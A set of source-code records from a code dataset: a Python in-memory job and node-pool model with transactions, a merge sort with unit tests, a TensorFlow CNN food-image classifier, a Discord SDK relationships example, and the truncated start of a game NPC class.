self.next_id_for_name = {}\n\n def get_id_for_job(self, job_name):\n if not self.next_id_for_name.has_key(job_name):\n self.next_id_for_name[job_name] = 2\n return \"%s-%d\" % (job_name, 1)\n else:\n job_id = self.next_id_for_name[job_name]\n self.next_id_for_name[job_name] = job_id + 1\n return \"%s-%d\" % (job_name, job_id)\n\n def has_job(self, job_id):\n return self.jobs_by_id.has_key(job_id)\n \n def add_job(self, job):\n assert not self.jobs_by_id.has_key(job.job_id)\n self.jobs_by_id[job.job_id] = job\n if self.jobs_by_name.has_key(job.name):\n self.jobs_by_name[job.name].append(job)\n else:\n self.jobs_by_name[job.name] = [job,]\n\n def delete_job(self, job):\n assert self.jobs_by_id.has_key(job.job_id)\n del self.jobs_by_id[job.job_id]\n l = self.jobs_by_name[job.name]\n for i in range(len(l)):\n if l[i] == job:\n del l[i]\n return\n assert 0\n\n def query_jobs(self, job_id=None, job_name=None,\n pool_name=None):\n if job_id:\n if self.jobs_by_id.has_key(job_id):\n return [self.jobs_by_id[job_id],]\n else:\n return []\n elif job_name:\n if 
self.jobs_by_name.has_key(job_name):\n return [job for job in self.jobs_by_name[job_name]]\n else:\n return []\n elif pool_name:\n results = []\n for job in self.jobs_by_id.values():\n if job.node_pool and job.node_pool.name==pool_name:\n results.append(job)\n return results\n else:\n return [job for job in self.jobs_by_id.values()]\n \n\nclass CompareError(Exception):\n def __init__(self, current_has, other_has):\n Exception.__init__(self, \"State.compare(): Current state has %s, other state has %s\" % (current_has, other_has))\n\n\nclass State(object):\n def __init__(self):\n self.pools = {}\n self.all_nodes = NodeDb()\n self.jobs = JobDb()\n self.locked_objects = []\n self.incarnation = 1\n\n def has_locked_objects(self):\n return len(self.locked_objects)>0\n \n def lock_object(self, obj):\n assert obj.locked==False\n obj.locked = True\n self.locked_objects.append(obj)\n \n def unlock_all(self):\n for obj in self.locked_objects:\n obj.locked = False\n self.locked_objects = []\n\n def inc_incarnation(self, model):\n assert len(self.locked_objects)==0\n hwm = max(model.incarnation_hwm, self.incarnation)\n self.incarnation = hwm + 1\n model.incarnation_hwm = self.incarnation\n for pool in self.pools.values():\n pool.incarnation = self.incarnation\n for node in self.all_nodes.get_all_nodes():\n node.incarnation = self.incarnation\n for job in self.jobs.jobs_by_id.values():\n job.incarnation = self.incarnation\n for task in job.tasks:\n task.incarnation = self.incarnation\n\n def copy(self, model):\n \"\"\"Create a deep copy of the state, but ensure that everything points\n to the original model.\n \"\"\"\n cpy = copy.deepcopy(self)\n for node in cpy.all_nodes.by_name.values():\n node.model = model\n for pool in cpy.pools.values():\n pool.model = model\n return cpy\n\n def compare(self, other_state, should_have_same_incarnation=True):\n \"\"\"Compare two instances of the state object and throw an exception\n if they are different. 
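The check covers incarnations, pools, nodes, jobs, and tasks. 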
Useful for testing.\n \"\"\"\n def check_inc(state, obj):\n if obj.incarnation != state.incarnation:\n raise Exception(\"State.compare(): object %s has incarnation %d while state has incarnation %d\" %\n (obj, obj.incarnation, state.incarnation))\n def ref_field_to_str(reference, attribute):\n if reference==None:\n return \"None\"\n elif not hasattr(reference, attribute):\n raise Exception(\"Object of type %s, missing field %s\" %\n (type(reference), attribute))\n else:\n return getattr(reference, attribute)\n def compare_fields(obj, ref_type, my, other, attribute):\n mfv = ref_field_to_str(my, attribute)\n ofv = ref_field_to_str(other, attribute)\n if mfv != ofv:\n raise CompareError(\"%s.%s.%s=%s\" % (obj,\n my if my else ref_type.__name__,\n attribute, mfv),\n \"%s.%s.%s=%s\" % (obj,\n other if other else ref_type.__name__,\n attribute, ofv))\n o = other_state\n if should_have_same_incarnation and \\\n (o.incarnation != self.incarnation):\n raise CompareError(\"incarnation=%d\" % self.incarnation,\n \"incarnation=%d\" % o.incarnation)\n my_pools = set(self.pools.keys())\n other_pools = set(o.pools.keys())\n if my_pools != other_pools:\n raise CompareError(\"pools=%s\" % my_pools,\n \"pools=%s\" % other_pools)\n my_nodes = set(self.all_nodes.by_name.keys())\n other_nodes = set(o.all_nodes.by_name.keys())\n if my_nodes != other_nodes:\n raise CompareError(\"nodes=%s\" % my_nodes,\n \"nodes=%s\" % other_nodes)\n my_jobs = set(self.jobs.jobs_by_id.keys())\n other_jobs = set(o.jobs.jobs_by_id.keys())\n if my_jobs != other_jobs:\n raise CompareError(\"jobs=%s\" % my_jobs,\n \"jobs=%s\" % other_jobs)\n # check the details of the nodes\n for node in self.all_nodes.by_name.values():\n check_inc(self, node)\n other_node = o.all_nodes.by_name[node.name]\n check_inc(o, other_node)\n if node.pool:\n if not other_node.pool:\n raise CompareError(\"pool=%s\" % node.pool.name,\n \"pool=None\")\n if other_node.pool.name != node.pool.name:\n raise CompareError(\"pool=%s\" % node.pool.name,\n \"pool=%s\" % other_node.pool.name)\n elif other_node.pool:\n raise CompareError(\"pool=None\",\n \"pool=%s\" % other_node.pool.name)\n if node.job:\n compare_fields(node, model.Job, node.job, other_node.job, \"job_id\")\n compare_fields(node, model.Task, node.task, other_node.task, \"task_id\")\n else:\n if node.task:\n raise Exception(\"Node %s task field is set when no job\" % node.name)\n if other_node.task:\n raise Exception(\"Other ode %s task field is set when no job\" % other_node.name)\n \n # check the details of the pools\n for pool in self.pools.values():\n check_inc(self, pool)\n other_pool = o.pools[pool.name]\n check_inc(o, other_pool)\n if pool.available_set != other_pool.available_set:\n raise CompareError(\"pool.available_set=%s\" % pool.available_set,\n \"pool.available_set=%s\" % other_pool.available_set)\n p_nodes = set(pool.nodes_by_name.keys())\n op_nodes = set(other_pool.nodes_by_name.keys())\n if p_nodes != op_nodes:\n raise CompareError(\"pool.nodes_by_name=%s\" % p_nodes,\n \"pool.nodes_by_name=%s\" % op_nodes)\n # check the details of the jobs\n for job in self.jobs.jobs_by_id.values():\n check_inc(self, job)\n other_job = o.jobs.jobs_by_id[job.job_id]\n check_inc(o, other_job)\n compare_fields(job, model.NodePool, job.node_pool, other_job.node_pool, \"name\")\n j_nodes = set([node.name for node in job.current_nodes])\n o_nodes = set([node.name for node in other_job.current_nodes])\n if j_nodes != o_nodes:\n raise CompareError(\"job.current_nodes=%s\" % j_nodes,\n \"job.current_nodes=%s\" % 
o_nodes)\n # check the details of the tasks\n if len(job.tasks)!=len(other_job.tasks):\n raise CompareError(\"len(job.tasks)=%d\" % len(job.tasks),\n \"len(job.tasks)=%d\" % len(other_job.tasks))\n for i in range(len(job.tasks)):\n task = job.tasks[i]\n check_inc(self, task)\n if task.job!=job:\n raise CompareError(\"State.compare(): task %d does not point to job %s\" %\n (i, job.job_id))\n other_task = other_job.tasks[i]\n check_inc(o, other_task)\n if other_task.job!=other_job:\n raise CompareError(\"State.compare(): task %d does not point to job %s\" %\n (i, other_job.job_id))\n if task.name!=other_task.name:\n raise CompareError(\"task.name=%s\" % task.name,\n \"task.name=%s\" % other_task.name)\n if task.node_name!=other_task.node_name:\n raise CompareError(\"task.node_name=%s\" % task.node_name,\n \"task.node_name=%s\" % other_task.node_name)\n\n \n \n \n@apply_interface_contracts(model.Node)\nclass Node(model.Node):\n def __init__(self, model, name, os_username, worker_port, is_temporary,\n hostname=None, public_ip=None, private_ip=None, pool=None):\n self.model = model\n self.name = name\n self.os_username = os_username\n self.worker_port = worker_port\n self._is_temporary = is_temporary\n self.hostname = hostname\n self.public_ip = public_ip\n self.private_ip = private_ip\n self.pool = pool\n self.job = None\n self.locked = False\n self.incarnation = self.model._get_incarnation()\n self.task = None\n\n def get_name(self): return self.name\n\n def get_hostname(self): return self.hostname\n\n def get_public_ip(self): return self.public_ip\n\n def get_private_ip(self): return self.private_ip\n\n def get_os_username(self): return self.os_username\n\n def get_worker_port(self): return self.worker_port\n \n def is_temporary(self):\n return self._is_temporary\n\n def get_pool(self):\n return self.pool\n\n def get_job(self): return self.job\n\n def _set_job(self, job):\n assert self.job==None\n check_inc(self, job)\n self.job = job\n\n def _clear_job(self):\n assert self.job\n self.job = None\n\n def get_task(self): return self.task\n\n def _set_task(self, task):\n assert self.task==None\n self.task = task\n\n def _clear_task(self):\n assert self.task\n self.task = None\n \n def lock(self):\n if not self.locked:\n self.model._lock_object(self)\n\n def __repr__(self):\n return \"Node(%s)\" % self.name\n\n \n@apply_interface_contracts(model.StaticNodePool) \nclass StaticNodePool(model.StaticNodePool):\n def __init__(self, model, name):\n self.model = model\n self.name = name\n self.available_set = set()\n self.nodes_by_name = {}\n self.locked = False\n self.incarnation = model._get_incarnation()\n\n def get_name(self): return self.name\n\n def get_current_size(self): return len(self.nodes_by_name)\n\n def get_current_available_size(self): return len(self.available_set)\n\n def _get_model_adapter(self): return self.model\n\n def lock(self):\n self.model._lock_object(self)\n\n def get_all_nodes_in_pool(self):\n return self.nodes_by_name.values()\n\n def _choose_one_available_node(self, job):\n if len(self.available_set)==0:\n raise NodesNotAvailable(\"StaticNodePoool._choose_one_available_node() called when no nodes are available in pool\")\n node_name = self.available_set.pop()\n node = self.nodes_by_name[node_name]\n node._set_job(job)\n return node\n \n def _take_node_from_available_set(self, node, job):\n assert node.name in self.available_set\n assert node.job == None\n self.available_set.remove(node.name)\n node._set_job(job)\n\n def _release_node(self, node, job):\n assert node.job == 
job\n assert not (node.name in self.available_set)\n check_inc(self, node)\n check_inc(self, job)\n node._clear_job()\n self.available_set.add(node.name)\n\n def __repr__(self):\n return \"StaticNodePool(%s)\" % self.name\n\n\n@apply_interface_contracts(model.Job)\nclass Job(model.Job):\n def __init__(self, incarnation, job_id, name, job_type, description,\n coordinator_lockfile,\n node_pool=None):\n self.incarnation = incarnation\n self.job_id = job_id\n self.name = name\n self.job_type = job_type\n self.description = description\n self.coordinator_lockfile = coordinator_lockfile\n self.current_nodes = []\n self.tasks = []\n self.task_names = set() # just used as a sanity check on completed tasks\n self.node_pool = node_pool\n self.completion_status = None\n self.completion_comment = None\n self.num_active_tasks = 0\n\n def get_id(self): return self.job_id\n \n def get_name(self): return self.name\n\n def get_job_type(self): return self.job_type\n\n def get_description(self): return self.description\n\n def get_coordinator_lockfile(self): return self.coordinator_lockfile\n\n def get_current_nodes(self):\n return copy.copy(self.current_nodes)\n\n def get_node_by_name(self, node_name):\n for node in self.current_nodes:\n if node.name==node_name:\n return node\n return None\n \n def get_task_by_id(self, task_id):\n task_idx = task_id - 1\n if task_idx<0 or task_idx>len(self.tasks):\n raise ModelError(\"Invalid task id for job %s: %d\" %\n (self.name, task_id))\n return self.tasks[task_idx]\n \n def get_node_pool(self): return self.node_pool\n\n def _associate_node_with_job(self, node):\n check_inc(self, node)\n for n in self.current_nodes:\n if n==node:\n raise Exception(\"Attempting to add node %s to job multiple times\" %\n node.name)\n self.current_nodes.append(node)\n\n def _disassociate_node_from_job(self, node):\n check_inc(self, node)\n for i in range(len(self.current_nodes)):\n if node==self.current_nodes[i]:\n del self.current_nodes[i]\n return\n raise Exception(\"Node %s not associated with job %s\" %\n (node.name, self.name))\n\n def get_status(self):\n return self.completion_status\n\n def _stop_job(self, job_status, comment=None):\n assert self.completion_status==None\n self.completion_status = job_status\n self.completion_comment = comment\n self.coordinator_lockfile = None\n\n def _add_task(self, task):\n self.tasks.append(task)\n self.task_names.add(task.name)\n self.num_active_tasks += 1\n\n def _task_has_completed(self, task):\n assert task.name in self.task_names, \\\n \"task %s not in %s\" % (task.name, self.task_names)\n self.num_active_tasks -= 1\n\n def get_num_active_tasks(self):\n return self.num_active_tasks\n\n def get_all_tasks(self):\n return [task for task in self.tasks]\n\n def __repr__(self):\n return \"Job(%s)\" % self.job_id\n\n\n@apply_interface_contracts(model.Task)\nclass Task(model.Task):\n def __init__(self, model, task_id, name, job, task_type, node_name,\n description):\n self.incarnation = model._get_incarnation()\n self.task_id = task_id\n self.name = name\n self.job = job\n self.task_type = task_type\n self.node_name = node_name\n self.description = description\n self.result_status = None\n\n def get_id(self): return self.task_id\n \n def get_name(self): return self.name\n\n def get_task_type(self): return self.task_type\n\n def get_job(self): return self.job\n\n def get_description(self): return self.description\n\n def get_node_name(self): return self.node_name\n\n def _set_result_status(self, result_status):\n assert self.result_status==None\n 
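# the result status is write-once: it may only move from None to a final value\n        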
self.result_status = result_status\n\n def get_result_status(self):\n return self.result_status\n\n def __repr__(self):\n return \"Task(%s, %d)\" % (self.job.job_id, self.task_id)\n\n\n@apply_interface_contracts(model.ModelAdapterBase)\nclass ModelAdapter(model.ModelAdapterBase):\n def __init__(self, config_path):\n self.state = None\n self.prev_state = State()\n self.db_created = False\n self.incarnation_hwm = 0 # incarnation high water mark\n\n def create_database(self):\n assert not self.db_created\n self.db_created = True\n \n def create_static_pool(self, pool_name):\n assert not self.state.pools.has_key(pool_name)\n pool = StaticNodePool(self, pool_name)\n self.state.pools[pool_name] = pool\n return pool\n\n def delete_static_pool(self, pool):\n assert len(pool.nodes_by_name)==0\n assert self.state.pools.has_key(pool.name)\n del self.state.pools[pool.name]\n\n def query_pools(self, pool_name=None):\n if pool_name:\n if self.state.pools.has_key(pool_name):\n return [self.state.pools[pool_name],]\n else:\n return []\n else:\n return [pool for pool in self.state.pools.values()]\n \n def find_node(self, name=None, hostname=None, public_ip=None,\n private_ip=None):\n return self.state.all_nodes.find_node(name=name, hostname=hostname,\n public_ip=public_ip,\n private_ip=private_ip)\n\n def query_nodes(self, pool_name=None, job_id=None):\n if pool_name and job_id:\n raise ModelError(\"Cannot specify both pool_name and job_id in query_nodes()\")\n if pool_name:\n if not self.state.pools.has_key(pool_name):\n raise ModelError(\"Pool %s does not exist\" % pool_name)\n pool = self.state.pools[pool_name]\n return [node for node in pool.get_all_nodes_in_pool()]\n elif job_id:\n if not self.state.jobs.has_job(job_id):\n raise ModelError(\"Job id %s does not exist\" % job_id)\n job = self.state.jobs.jobs_by_id[job_id]\n return job.get_current_nodes()\n else:\n return [node for node in self.state.all_nodes.get_all_nodes()]\n \n def create_node(self, os_username, worker_port, is_temporary,\n name=None, hostname=None, public_ip=None,\n private_ip=None,\n pool=None):\n if (not hostname) and (not public_ip) and (not private_ip):\n raise Exception(\"Need to specify one of hostname, public_ip or private_ip\") \n if not name:\n if hostname:\n name = hostname\n elif public_ip:\n name = public_ip\n elif private_ip:\n name = private_ip\n else:\n assert 0\n node = Node(self, name, os_username, worker_port, is_temporary,\n hostname, public_ip, private_ip, pool)\n self.state.all_nodes.add_node(node)\n if pool:\n pool.nodes_by_name[name] = node\n pool.available_set.add(name)\n return node\n\n def _check_inc(self, obj):\n if obj.incarnation!=self._get_incarnation():\n msg = \"Atempt to reference a stale object from an aborted transaction. 
%s of type %s has incarnation %d, while the model has incarnation %d\" %\\\n                  (obj, type(obj), obj.incarnation, self._get_incarnation())\n            raise StaleRefError(msg)\n        \n    def delete_node(self, node):\n        assert node.job==None\n        self._check_inc(node)\n        if node.pool:\n            del node.pool.nodes_by_name[node.name]\n            if node.name in node.pool.available_set:\n                node.pool.available_set.remove(node.name)\n        self.state.all_nodes.remove_node(node)\n        \n    def create_job(self, name, job_type, description,\n                   coordinator_lockfile, node_pool=None):\n        job_id = self.state.jobs.get_id_for_job(name)\n        if node_pool:\n            self._check_inc(node_pool)\n        job = Job(self._get_incarnation(), job_id,\n                  name, job_type, description,\n                  coordinator_lockfile,\n                  node_pool=node_pool)\n        self.state.jobs.add_job(job)\n        return job\n\n    def delete_job(self, job):\n        assert self.state.jobs.has_job(job.job_id)\n        self.state.jobs.delete_job(job)\n\n    def query_jobs(self, job_id=None, job_name=None, pool_name=None):\n        return self.state.jobs.query_jobs(job_id=job_id, job_name=job_name,\n                                          pool_name=pool_name)\n\n    def create_task(self, name, job, task_type, node, description):\n        assert self.is_in_transaction()\n        self._check_inc(job)\n        self._check_inc(node)\n        node.lock()\n        assert node.job == job\n        task_id = len(job.tasks) + 1\n        task = Task(self, task_id, name, job, task_type, node.name, description)\n        node._set_task(task)\n        job._add_task(task)\n        return task\n    \n    def _lock_object(self, obj):\n        assert self.is_in_transaction()\n        self._check_inc(obj)\n        self.state.lock_object(obj)\n\n    def begin_transaction(self):\n        assert self.prev_state!=None\n        assert self.state==None\n        self.state = self.prev_state\n        assert not self.state.has_locked_objects()\n        self.state.inc_incarnation(self)\n        self.prev_state = self.state.copy(self)\n\n    def commit_transaction(self):\n        assert self.is_in_transaction()\n        self.state.unlock_all()\n        self.prev_state = self.state\n        self.state = None\n    \n    def abort_transaction(self):\n        \"\"\" Go back to the previous state.\n        \"\"\"\n        assert self.is_in_transaction()\n        self.state = None\n        self.prev_state.inc_incarnation(self)\n    \n    def is_in_transaction(self):\n        return self.state!=None\n\n    def _get_incarnation(self):\n        return self.state.incarnation\n\n    def _check_obj_valid(self, obj):\n        self._check_inc(obj)\n","sub_path":"dist_job_mgr/mem_model.py","file_name":"mem_model.py","file_ext":"py","file_size_in_byte":27012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"257198878","text":"import unittest # @UnresolvedImport\n\ndef merge(inList1, inList2):\n    \"\"\"Merge two already-sorted lists into a single sorted list.\n    \"\"\"\n    result = []\n    add_to_result = result.append\n    i,j = 0,0\n    while True:\n        if i < len(inList1) and j < len(inList2):\n            if inList1[i] < inList2[j]:\n                add_to_result(inList1[i])\n                i+=1\n            else:\n                add_to_result(inList2[j])\n                j+=1\n        elif i < len(inList1):\n            # copy the remaining tail of inList1\n            for k in xrange(i,len(inList1)): add_to_result(inList1[k])\n            break\n        else:\n            # copy the remaining tail of inList2\n            for k in xrange(j,len(inList2)): add_to_result(inList2[k])\n            break\n    return result\n\ndef merge_sort(in_list):\n    if len(in_list) <= 1: return in_list\n    mid = len(in_list)//2\n    return merge(merge_sort(in_list[:mid]),merge_sort(in_list[mid:]))\n\n\nclass MergeSortTest(unittest.TestCase):\n    def test_triviallyOkLen(self):\n        test_input = [4,3,2,1]\n        expected = [1,2,3,4]\n        actual = merge_sort(test_input)\n        self.failUnlessEqual(expected,actual)\n    \n    def test_triviallyOk(self):\n        test_input = [4]\n        expected = [4]\n        actual = merge_sort(test_input)\n        self.failUnlessEqual(expected,actual)\n\nif __name__ == \"__main__\":\n    
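# running this module directly executes the test cases above\n    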
unittest.main() \n \n \n \n ","sub_path":"pythonTest/src/mergeSort.py","file_name":"mergeSort.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"385299425","text":"import tensorflow as tf\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nimport numpy as np\n#import cv2 as cv\nimport random\nimport csv\nimport time\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras import layers, datasets, models\nfrom sklearn.metrics import confusion_matrix\nimport pandas as pd\nfrom sklearn.utils import class_weight \n\n# collect the images into per-class lists and attach the matching labels to the label lists\ndef get_files(file_dir):\n    '''\n    image_list=[]\n    label_list=[]\n    for file in os.listdir(file_dir ):\n        a = file_dir + '/' + file\n        image_list.append(a)\n        label = file[0]\n        label_list.append(label)\n    '''\n    Bread = []\n    label_Bread = []\n    DairyProduct = []\n    label_DairyProduct = []\n    Dessert = []\n    label_Dessert = []\n    Egg = []\n    label_Egg = []\n    FriedFood = []\n    label_FriedFood = []\n    Meat = []\n    label_Meat = []\n    Noodles = []\n    label_Noodles = []\n    Rice = []\n    label_Rice = []\n    Seafood = []\n    label_Seafood = []\n    Soup = []\n    label_Soup = []\n    Vegetable = []\n    label_Vegetable = []\n\n    for file in os.listdir(file_dir + '/Bread'):\n        Bread.append(file_dir + '/Bread' + '/' + file)\n        label_Bread.append(0)\n\n    for file in os.listdir(file_dir + '/DairyProduct'):\n        DairyProduct.append(file_dir + '/DairyProduct' + '/' + file)\n        label_DairyProduct.append(1)\n\n    for file in os.listdir(file_dir + '/Dessert'):\n        Dessert.append(file_dir + '/Dessert' + '/' + file)\n        label_Dessert.append(2)\n\n    for file in os.listdir(file_dir + '/Egg'):\n        Egg.append(file_dir + '/Egg' + '/' + file)\n        label_Egg.append(3)\n\n    for file in os.listdir(file_dir + '/FriedFood'):\n        FriedFood.append(file_dir + '/FriedFood' + '/' + file)\n        label_FriedFood.append(4)\n\n    for file in os.listdir(file_dir + '/Meat'):\n        Meat.append(file_dir + '/Meat' + '/' + file)\n        label_Meat.append(5)\n\n    for file in os.listdir(file_dir + '/Noodles'):\n        Noodles.append(file_dir + '/Noodles' + '/' + file)\n        label_Noodles.append(6)\n\n    for file in os.listdir(file_dir + '/Rice'):\n        Rice.append(file_dir + '/Rice' + '/' + file)\n        label_Rice.append(7)\n\n    for file in os.listdir(file_dir + '/Seafood'):\n        Seafood.append(file_dir + '/Seafood' + '/' + file)\n        label_Seafood.append(8)\n\n    for file in os.listdir(file_dir + '/Soup'):\n        Soup.append(file_dir + '/Soup' + '/' + file)\n        label_Soup.append(9)\n\n    for file in os.listdir(file_dir + '/Vegetable'):\n        Vegetable.append(file_dir + '/Vegetable' + '/' + file)\n        label_Vegetable.append(10)\n    \n    # merge the per-class data\n    image_list = np.hstack((Bread, DairyProduct, Dessert, Egg, FriedFood, Meat,Noodles,Rice,Seafood,Soup,Vegetable))\n    label_list = np.hstack((label_Bread, label_DairyProduct, label_Dessert, label_Egg, label_FriedFood, label_Meat,label_Noodles,label_Rice,label_Seafood,label_Soup,label_Vegetable))\n    # shuffle the data\n\n    temp = np.array([image_list, label_list])\n    temp = temp.transpose() # transpose\n    np.random.shuffle(temp)\n\n    # convert all the images and labels back into lists\n    image_list = list(temp[:, 0])\n    image_list = [i for i in image_list]\n    label_list = list(temp[:, 1])\n    label_list = [int((i)) for i in label_list]\n\n    return image_list, label_list\n\ndef get_files1(file_dir):\n    test = []\n    for file in os.listdir(file_dir):\n        test.append(file_dir + '/' + file)\n    return test\n\ndef get_tensor(image_list, label_list=[]):\n    ims = []\n    for image in image_list:\n        # read the image file at this path\n        x = tf.io.read_file(image)\n        
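# (note: tf.io.read_file returns the raw encoded bytes; decoding happens next)\n        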
# decode the bytes into a 3-channel image\n        x = tf.image.decode_jpeg(x, channels=3)\n        # resize the image\n        x = tf.image.resize(x,[32,32])\n        # append the image to the list\n        ims.append(x)\n    # convert the list into a tensor\n    img = tf.convert_to_tensor(ims)\n    y = tf.convert_to_tensor(label_list)\n    return img,y\n\ndef plot_learning_curves(history,epoch):\n    '''Plot tra_accuracy and val_accuracy'''\n    plt.plot(np.arange(1,epoch+1),history.history['accuracy'],label='tra_accuracy')\n    plt.plot(np.arange(1,epoch+1),history.history['val_accuracy'],label='val_accuracy') # the x axis follows the epoch count\n    plt.grid(True) # show the grid\n    #plt.gca().set_ylim(0,1) # set the y-axis range\n    plt.xlabel('epoch')\n    plt.ylabel('accuracy')\n    plt.legend() # show the legend\n    plt.show()\n\n\ndef plot_confusion_matrix(cm, labels_name, title):\n    '''Plot the confusion matrix'''\n    cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis] # normalize each row\n    plt.imshow(cm, interpolation='nearest') # display the matrix as an image\n    plt.title(title) # figure title\n    plt.colorbar()\n    num_local = np.array(range(len(labels_name))) \n    plt.xticks(num_local, labels_name, rotation=90) # print the labels on the x axis\n    plt.yticks(num_local, labels_name) # print the labels on the y axis\n    plt.ylabel('True label') \n    plt.xlabel('Predicted label')\n    # annotate the cell values\n    for i in range(len(cm)): # row index\n        for j in range(len(cm[i])): # column index\n            plt.text(i, j, round(cm[i][j],2),horizontalalignment=\"center\",color=\"white\" if cm[i, j] > 0.2 else \"black\",fontsize=5)\n    plt.show()\n\nif __name__ == \"__main__\":\n\n    labels_name = ['Bread', 'DairyProduct', 'Dessert', 'Egg', 'FriedFood', 'Meat','Noodles','Rice','Seafood','Soup','Vegetable']\n    # paths of the training images\n    train_dir = 'training1'\n    test_dir = 'testing'\n    val_dir = 'validation1'\n    AUTOTUNE = tf.data.experimental.AUTOTUNE\n\n    # training images and labels\n    image_list, label_list = get_files(train_dir)\n    train_x, train_y = get_tensor(image_list, label_list=label_list)\n    \n    # validation images and labels\n    val_image_list,val_label_list = get_files(val_dir)\n    val_x, val_y = get_tensor(val_image_list,label_list=val_label_list)\n    \n    # test set\n    test_list = get_files1(test_dir)\n    test,_ = get_tensor(test_list)\n    \n    # normalize\n    train_x, val_x = train_x / 255.0, val_x / 255.0\n    print('train_x shape:', train_x.shape, 'val_x shape:', val_x.shape)\n    \n\n    # build the model\n    model = models.Sequential()\n    model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(32, 32, 3)))\n    model.add(layers.MaxPooling2D((2, 2)))\n    model.add(layers.Conv2D(64, (3, 3), activation='relu'))\n    model.add(layers.MaxPooling2D((2, 2)))\n    model.add(layers.Conv2D(64, (3, 3), activation='relu'))\n    model.add(layers.Flatten())\n    model.add(layers.Dense(64, activation='relu'))\n    model.add(layers.Dense(11, activation='softmax'))\n    model.summary()\n\n    # compile\n    model.compile(optimizer='adam',\n                  loss='sparse_categorical_crossentropy',\n                  metrics=['accuracy'])\n    model.summary()\n    \n    # train on the training set and validate on the validation set\n    epoch = 30\n    #class_weights = class_weight.compute_class_weight('balanced',np.unique(label_list),label_list)\n    #class_weight_dict = dict(enumerate(class_weights))\n    history = model.fit(train_x, train_y, epochs=epoch,validation_data=(val_x,val_y)) # the epoch count is adjustable\n    model.evaluate(val_x,val_y)\n\n    # plot the accuracy curves\n    plot_learning_curves(history,epoch)\n    \n    # plot the confusion matrix\n    y_pred = []\n    y_pred1 = model.predict(val_x)\n    y_pred2 = list(y_pred1)\n    for x in y_pred2:\n        y_pred.append(np.argmax(x))\n    y_true = val_label_list\n    cm = confusion_matrix(y_true,y_pred)\n    plot_confusion_matrix(cm, labels_name, \"HAR Confusion Matrix\")\n    \n    \n\n\n    # predict on the test set\n    predict = model.predict(test)\n    pre = list(predict)\n\n    x_max = []\n    for x in pre:\n        x_max.append(np.argmax(x))\n    result = {'result':x_max}\n    df = pd.DataFrame(result)\n    df.to_csv(\"test_result.csv\")\n    
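# end of script: the per-image predictions are saved to test_result.csv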
\n\n\n","sub_path":"cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":7765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"205109710","text":"import random\nimport time\n\nimport discordsdk as dsdk\n\n\n# we get the application id from a file\nwith open(\"application_id.txt\", \"r\") as file:\n application_id = int(file.read())\n\n# we create the discord instance\napp = dsdk.Discord(application_id, dsdk.CreateFlags.default)\nrelationship_manager = app.get_relationship_manager()\n\n\n# events\ndef on_refresh():\n print(\"[on_refresh]\")\n\n # we filter friends\n relationship_manager.filter(\n lambda relationship: relationship.type == dsdk.RelationshipType.friend\n )\n\n # we get how many friends we have!!\n friend_count = relationship_manager.count()\n friends = []\n print(f\"You have {friend_count} friends!\")\n\n for n in range(friend_count):\n # we get the friend at index n\n friend = relationship_manager.get_at(n)\n\n # we add it to the list\n friends.append(friend)\n\n # we show it\n print(f\"{friend.user.username}#{friend.user.discriminator}\")\n\n if len(friends):\n print()\n\n # we get the friend with a random friend, by his ID\n random_friend = random.choice(friends)\n print(f\"Fetching {random_friend.user.id}\")\n\n friend = relationship_manager.get(random_friend.user.id)\n print(f\"We found {friend.user.username}.\")\n\n # let's get implicit relationships\n relationship_manager.filter(\n lambda relationship: relationship.type == dsdk.RelationshipType.implicit\n )\n\n print()\n print(\"Implicit relationships:\")\n for n in range(relationship_manager.count()):\n relationship = relationship_manager.get_at(n)\n print(f\" {relationship.user.username}#{relationship.user.discriminator}\")\n\n\ndef on_relationship_update(relationship):\n print(\"[on_relationship_update]\")\n print(f\"Relationship {relationship.user.username}\")\n\n\n# bind events\nrelationship_manager.on_refresh = on_refresh\nrelationship_manager.on_relationship_update = on_relationship_update\n\nwhile 1:\n time.sleep(1/10)\n app.run_callbacks()\n","sub_path":"examples/relationship.py","file_name":"relationship.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"86660529","text":"from Actor import *\nimport math, time, sys\n\n# Need to implement collision avoidance\n\n# This is the class that will be used by the NPCs\nclass NPC(Actor):\n\tdef __init__(self, offset_x, offset_y, actor_type, collision_type, patrol_route, game_map):\n\t\t# Don't forget to call the parent class!\n\t\tActor.__init__(self, offset_x, offset_y, actor_type, collision_type)\n\n\t\t# Route set for the NPC\n\t\tself.route = patrol_route\n\n\t\t# indexes for the lists\n\t\tself.route_index = 0\n\t\tself.astar_index = 0\n\n\t\t# Tile location of self\n\t\tself.tile_location = (self.rect.x/TILESIZE, self.rect.y/TILESIZE)\n\n\t\t#Tile math stuff\n\t\tself.next_tile = (0,0)\n\n\t\t# To keep track of whether the NPC is moving\n\t\tself.moving = False\n\n\t\t# slowing down the speed for patrol\n\t\tself.speed = 2\n\t\tself.change_timer = 8\n\n\t\t# Current state of the NPC\n\t\tself.state = None\n\n\t\t# The map of the game (used to check for objects on tiles)\n\t\tself.game_map = game_map\n\n\t\t# Check to see if path is done and index is set\n\t\tself.set = False\n\t\tself.set_index = False\n\n\t# AI pathfinding algorithm can be improved\n\tdef run_state(self, state, 
